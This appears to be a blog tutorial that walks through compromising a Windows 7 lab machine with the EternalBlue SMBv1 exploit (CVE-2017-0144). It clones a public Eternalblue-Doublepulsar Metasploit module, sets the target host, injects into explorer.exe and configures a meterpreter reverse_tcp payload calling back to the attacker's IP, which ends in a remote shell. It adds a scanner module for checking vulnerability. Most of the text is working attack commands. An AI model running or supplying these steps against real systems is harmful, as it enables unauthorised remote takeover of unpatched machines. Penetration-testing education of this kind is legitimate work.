Hacking Windows Server using EternalBlue Exploit
EternalBlue is nothing but an exploit that was actually developed and used by the National Security Agency (NSA). But this was somehow leaked by the hacker group named the Shadow Brokers in April 2017 and this exploit leaked online was then used in the worldwide WannaCry ransomware attack and NotPetya ransomware which had devastating effects. So what this exploit does is that it basically exploits a vulnerability in the Windows Server Message Block 1.0 (SMBv1). SMB is a protocol used by Windows machines in the same network to share files. So in this vulnerability, the SMBv1 server was unable to handle specially crafted payloads resulting in a remote code execution. This vulnerability has already been registered and could be found under CVE-2017-0144.
So let’s start with our demo
Our Victim: Windows 7 (IP address: 192.168.0.103)
Our Attacker: Kali (IP address: 192.168.0.105)
So Before starting, make sure you have wine installed in your kali. If not type in the following commands in your Kali. (wine is used to run exe files or windows applications in other operating systems)
dpkg –add-architecture i386
apt-get install wine32
Next, we need to download the exploit and place it in our Metasploit db.
so we can get our exploit from the following link: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
Go to your terminal and type:
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Now got to the folder where the exploit has been downloaded.
Copy the Eternal Blue-Doublepulsar.rb file and place it under the following directory /usr/share/metasploit-framework /module/exploits/windows/smb/
Now since everything is set up, start your Metasploit framework by typing msfconsole
Now serach for eternalblue exploit
Now type the following to use our doublepular exploit:
then type: show options
to list down all the options that are required to be filled up by us.
Next we need to set our remote or target host and the process to which we want to migrate into, so type the following commands:
set RHOST 192.168.0.103
set PROCESSINJECT explorer.exe
So now we need a payload that would give us a reverse connection in our meterpreter:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Set your host that would listen to your reverse connection (attacker’s IP address)
set LHOST 192.168.0.105
Now as everything is setup, just type in exploit and you are ready to go.
So thus we got our meterpreter session. Now just type in shell to give you the command prompt of your victim machine.
NOTE: There is also a module in Metasploit to check if the victim’s machine is vulnerable to this exploit or not. You could use this first to first check and then use the exploit as explained above to carry out the attack. We could use the module use auxiliary/scanner/smb/smb_ms17_010 and then set your target host to initiate the scan.
So that’s for now. See you next time. Goodbye
You can have a look at my previous article on Web Application Security. Here is the link of the article
Loved what you read?
If so, then kindly follow and share our website for much more interesting stuffs?
For any queries please send a Hi to my Linkedin Handle: Here